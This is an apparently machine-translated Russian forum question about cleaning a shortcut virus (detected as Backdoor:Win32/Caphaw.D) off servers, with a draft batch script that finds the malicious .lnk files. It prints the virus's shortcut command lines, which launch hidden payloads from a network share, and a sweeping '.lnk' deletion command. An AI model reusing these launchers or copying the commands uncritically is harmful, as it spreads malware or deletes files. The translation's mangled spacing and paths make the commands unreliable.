Вирус скрывает все папки и заменяет его на ярлык.
Это настройки в ярлыках.
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\folder\cs3can"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3d3t"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3mex\unload_from_vegas_20120501"
Я только что выполнил полное сканирование на сервере и обнаружил это
Бэкдор: Win32 / Caphaw.D .
Категория:
Backdoor
Описание:
Эта программа обеспечивает удаленный доступ к компьютеру, на котором она установлена.
Рекомендуемое действие: Немедленно удалите это программное обеспечение.
Forefront Endpoint Protection обнаружил программы, которые могут поставить под угрозу ваш компьютер. конфиденциальность или повреждение вашего компьютера. Вы по-прежнему можете получить доступ к файлам, которые используют эти программы, не удаляя их (не рекомендуется). Чтобы получить доступ к этим файлам, выберите действие Разрешить и нажмите Применить действия. Если этот параметр недоступен, войдите в систему как администратор илиобратитесь за помощью к администратору безопасности.
Предметы:
файл: E: \ applications \ Insite \ Documents \ Maps \ xuAaQgW.hSp
Получите дополнительную информацию об этом предмете в Интернете.
Обновление: Почему это не было обнаружено Microsoft Forefront?
Мне нравится создавать сценарий, который проходит через эти серверы и удаляет ярлык с C: \ Windows \ system32 \ cmd.exe / C запустить cmd.exe / C
.
Если я попытаюсь перейти на режим вручную, это займет много времени.
Я использовал эту команду в папке. del / s * .lnk
, который выполняет работу, но удаляет все, что есть lnk
Мне нравится удалять только ярлык, который начинается с C: \ Windows \ system32 \ cmd.exe / C запустите cmd.exe / C
.
cleanup.bat
@echo off
set delims="delims=;"
for /F %%a in ('findstr /m /i /r "C:\\Windows\\system32\\cmd.exe[ ][ ]*/Cstart[ ][ ]*cmd.exe[ ][ ]*/C" c:\directory\*.lnk') do (
@echo %%a
echo rem del %%a
)